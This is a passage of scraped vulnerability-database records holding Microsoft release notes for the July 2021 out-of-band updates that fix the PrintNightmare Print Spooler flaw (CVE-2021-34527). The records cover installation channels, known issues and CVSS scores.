**RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004954>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004954](<https://download.microsoft.com/download/7/3/c/73cce342-34cc-4e96-9924-e42c5a19efe3/5004954.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004954 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004954", "href": "https://support.microsoft.com/en-us/help/5004954", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\nThis security update includes key changes as follows:\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004948>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004948](<https://download.microsoft.com/download/4/a/8/4a80157a-c3e5-45b0-ab2d-9e6001b8ecd2/5004948.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004948 (OS Build 14393.4470) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004948", "href": "https://support.microsoft.com/en-us/help/5004948", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:45", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003697](<https://support.microsoft.com/help/5003697>) (released previous June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004956>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004956](<https://download.microsoft.com/download/e/f/5/ef50021e-60a9-47da-be60-b2687db452d3/5004956.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004956 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004956", "href": "https://support.microsoft.com/en-us/help/5004956", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004958>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004958](<https://download.microsoft.com/download/e/e/8/ee826b51-4cff-4102-9abf-cabaab679169/5004958.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004958 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004958", "href": "https://support.microsoft.com/en-us/help/5004958", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004959>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004959](<https://download.microsoft.com/download/b/1/7/b172b821-2078-46a7-9d3b-ad57b43bc04a/5004959.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004959 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004959", "href": "https://support.microsoft.com/en-us/help/5004959", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. \n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Prerequisite:You must install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003974) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004946>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004946](<https://download.microsoft.com/download/3/8/0/380275c2-0d42-4deb-a865-5059529c83f5/5004946.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 